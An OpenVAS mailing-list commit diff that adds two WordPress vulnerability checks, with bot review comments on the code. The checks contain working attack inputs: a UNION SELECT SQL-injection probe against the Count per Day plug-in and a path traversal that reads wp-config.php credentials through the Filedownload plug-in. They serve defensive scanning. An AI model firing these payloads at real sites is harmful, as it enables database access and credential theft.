[Openvas-commits] r11635 - in trunk/openvas-plugins: . scripts

scm-commit@wald.intevation.org scm-commit at wald.intevation.org
Mon Sep 19 14:01:04 CEST 2011


Author: mime
Date: 2011-09-19 14:00:59 +0200 (Mon, 19 Sep 2011)
New Revision: 11635

Added:
   trunk/openvas-plugins/scripts/gb_wordpress_49665.nasl
   trunk/openvas-plugins/scripts/gb_wordpress_49669.nasl
Modified:
   trunk/openvas-plugins/ChangeLog
   trunk/openvas-plugins/scripts/gb_horde_gollem_detect.nasl
   trunk/openvas-plugins/scripts/secpod_lightneasy_detect.nasl
   trunk/openvas-plugins/scripts/secpod_mediawiki_detect.nasl
Log:
Added new plugins. Typo fixed. Fixed empty "tmp_version".

Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog	2011-09-19 10:50:33 UTC (rev 11634)
+++ trunk/openvas-plugins/ChangeLog	2011-09-19 12:00:59 UTC (rev 11635)
@@ -1,3 +1,18 @@
+2011-09-19  Michael Meyer <michael.meyer at greenbone.net>
+
+	* scripts/gb_wordpress_49665.nasl,
+	scripts/gb_wordpress_49669.nasl:
+	Added new plugins.
+
+	* scripts/secpod_mediawiki_detect.nasl:
+	Typo fixed.
+
+	* scripts/gb_horde_gollem_detect.nasl:
+	Typo fixed.
+
+	* scripts/secpod_lightneasy_detect.nasl:
+	Fixed empty "tmp_version". 
+
 2011-09-19  Henri Doreau <henri.doreau at gmail.com>
 
 	* scripts/gb_tcptrack_detect.nasl: Fixed wrong variable name.

Modified: trunk/openvas-plugins/scripts/gb_horde_gollem_detect.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_horde_gollem_detect.nasl	2011-09-19 10:50:33 UTC (rev 11634)
+++ trunk/openvas-plugins/scripts/gb_horde_gollem_detect.nasl	2011-09-19 12:00:59 UTC (rev 11635)
@@ -47,7 +47,7 @@
 
 include("http_func.inc");
 include("http_keepalive.inc");
-nclude("cpe.inc");
+include("cpe.inc");
 include("host_details.inc");
 
 ## Constant values

Added: trunk/openvas-plugins/scripts/gb_wordpress_49665.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_wordpress_49665.nasl	2011-09-19 10:50:33 UTC (rev 11634)
+++ trunk/openvas-plugins/scripts/gb_wordpress_49665.nasl	2011-09-19 12:00:59 UTC (rev 11635)
@@ -0,0 +1,84 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# WordPress Count per Day Plugin 'month' Parameter SQL Injection Vulnerability
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(103259);
+ script_bugtraq_id(49665);
+ script_version ("1.0-$Revision$");
+
+ script_name("WordPress Count per Day Plugin 'month' Parameter SQL Injection Vulnerability");
+
+desc = "Overview:
+The 'Count per Day' plug-in for WordPress is prone to an SQL-injection
+vulnerability because it fails to sufficiently sanitize user-supplied
+data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the
+application, access or modify data, or exploit latent vulnerabilities
+in the underlying database.
+
+Count per Day versions 2.17 and prior are vulnerable.
+
+References:
+http://www.securityfocus.com/bid/49665
+http://wordpress.org/extend/plugins/count-per-day/
+http://www.wordpress.com";
+
+ script_tag(name:"risk_factor", value:"Medium");
+ script_description(desc);
+ script_summary("Determine if installed WordPress is vulnerable");
+ script_category(ACT_ATTACK);
+ script_family("Web application abuses");
+ script_copyright("This script is Copyright (C) 2011 Greenbone Networks GmbH");
+ script_dependencies("secpod_wordpress_detect_900182.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("host_details.inc");
+include("http_keepalive.inc");
+include("version_func.inc");
+   
+port = get_http_port(default:80);
+if(!get_port_state(port))exit(0);
+
+if(!can_host_php(port:port))exit(0);
+
+if(!dir = get_dir_from_kb(port:port,app:"WordPress"))exit(0);
+url = string(dir, "/wp-content/plugins/count-per-day/notes.php?month=-1%20UNION%20ALL%20SELECT%201,2,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374--"); 
+
+if(http_vuln_check(port:port, url:url,pattern:"OpenVAS-SQL-Injection-Test")) {
+     
+  security_warning(port:port);
+  exit(0);
+
+}
+
+exit(0);
+
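Review bot: The hex literal in the probe URL is unexplained, and nothing ties it to the `pattern` argument of `http_vuln_check` two lines below; a reader has to decode it by hand to see that it spells `OpenVAS-SQL-Injection-Test`. A comment above the `url = string(...)` line would record why the check is sound: `# hex literal = "OpenVAS-SQL-Injection-Test"; the plain marker never appears in the request, so a match means the database evaluated it rather than the page echoing the URL`. `host_details.inc` and `version_func.inc` appear to be unused in this script, since no version comparison or host-detail call is visible, and could be dropped. `script_summary` says "installed WordPress" although the request targets the Count per Day plug-in, so naming the plug-in there would make scan reports easier to triage.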


Property changes on: trunk/openvas-plugins/scripts/gb_wordpress_49665.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/gb_wordpress_49669.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_wordpress_49669.nasl	2011-09-19 10:50:33 UTC (rev 11634)
+++ trunk/openvas-plugins/scripts/gb_wordpress_49669.nasl	2011-09-19 12:00:59 UTC (rev 11635)
@@ -0,0 +1,84 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# WordPress Filedownload Local File Disclosure Vulnerability
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(103258);
+ script_bugtraq_id(49669);
+ script_version ("1.0-$Revision$");
+
+ script_name("WordPress Filedownload Local File Disclosure Vulnerability");
+
+desc = "Overview:
+The Filedownload plug-in for WordPress is prone to a local file-
+disclosure vulnerability because it fails to adequately validate user-
+supplied input.
+
+Exploiting this vulnerability could allow an attacker to obtain
+potentially sensitive information from local files on computers
+running the vulnerable application. This may aid in further attacks.
+
+Filedownload 0.1 is vulnerable; other versions may also be affected.
+
+References:
+http://www.securityfocus.com/bid/49669
+http://plugins.svn.wordpress.org/filedownload/trunk/filedownload.php
+http://wordpress.org/";
+
+ script_tag(name:"risk_factor", value:"High");
+ script_description(desc);
+ script_summary("Determine if installed WordPress is vulnerable");
+ script_category(ACT_ATTACK);
+ script_family("Web application abuses");
+ script_copyright("This script is Copyright (C) 2011 Greenbone Networks GmbH");
+ script_dependencies("secpod_wordpress_detect_900182.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("host_details.inc");
+include("http_keepalive.inc");
+include("version_func.inc");
+   
+port = get_http_port(default:80);
+if(!get_port_state(port))exit(0);
+
+if(!can_host_php(port:port))exit(0);
+
+if(!dir = get_dir_from_kb(port:port,app:"WordPress"))exit(0);
+url = string(dir,"/wp-content/plugins/filedownload/download.php/?path=../../../wp-config.php "); 
+
+if(http_vuln_check(port:port, url:url,pattern:"DB_NAME",extra_check:make_list("DB_USER","DB_PASSWORD","DB_HOST"))) {
+     
+  security_hole(port:port);
+  exit(0);
+
+}
+
+exit(0);
+
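Review bot: The URL literal built just before the `http_vuln_check` call ends in a space (`wp-config.php "`), which looks unintentional and puts a stray space into the request path; depending on how the request line is assembled, this may produce a malformed request and a false negative. If it is not deliberate, close the string directly after the file name, i.e. end the line with `wp-config.php");`. On a positive hit the response body contains the site's database settings, so it is right that `security_hole(port:port)` is called without passing the response as `data`; a short comment saying so would keep a later edit from copying credentials into the scan report. `host_details.inc` and `version_func.inc` appear to be unused here as well.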


Property changes on: trunk/openvas-plugins/scripts/gb_wordpress_49669.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Modified: trunk/openvas-plugins/scripts/secpod_lightneasy_detect.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_lightneasy_detect.nasl	2011-09-19 10:50:33 UTC (rev 11634)
+++ trunk/openvas-plugins/scripts/secpod_lightneasy_detect.nasl	2011-09-19 12:00:59 UTC (rev 11635)
@@ -96,7 +96,7 @@
     {
       if(lightNEasyVer[1]!= NULL)
       {
-        tmp_version = 
+        tmp_version = lightNEasyVer[1] + " under " + lightDir;
         set_kb_item(name:"www/"+ lightNEasyPort + "/LightNEasy/Sqlite",
                     value:tmp_version);
         security_note(data:"LightNEasy version " + lightNEasyVer[1] +

Modified: trunk/openvas-plugins/scripts/secpod_mediawiki_detect.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_mediawiki_detect.nasl	2011-09-19 10:50:33 UTC (rev 11634)
+++ trunk/openvas-plugins/scripts/secpod_mediawiki_detect.nasl	2011-09-19 12:00:59 UTC (rev 11635)
@@ -102,7 +102,7 @@
                  " running at location " + dir +  " was detected on the host");
      
         ## build cpe and store it as host_detail
-        register__cpe(tmpVers:tmp_version, tmpExpr:"^([0-9.]+)", tmpBase:"cpe:/a:mediawiki:mediawiki:");
+        register_cpe(tmpVers:tmp_version, tmpExpr:"^([0-9.]+)", tmpBase:"cpe:/a:mediawiki:mediawiki:");
 
       }
       else {


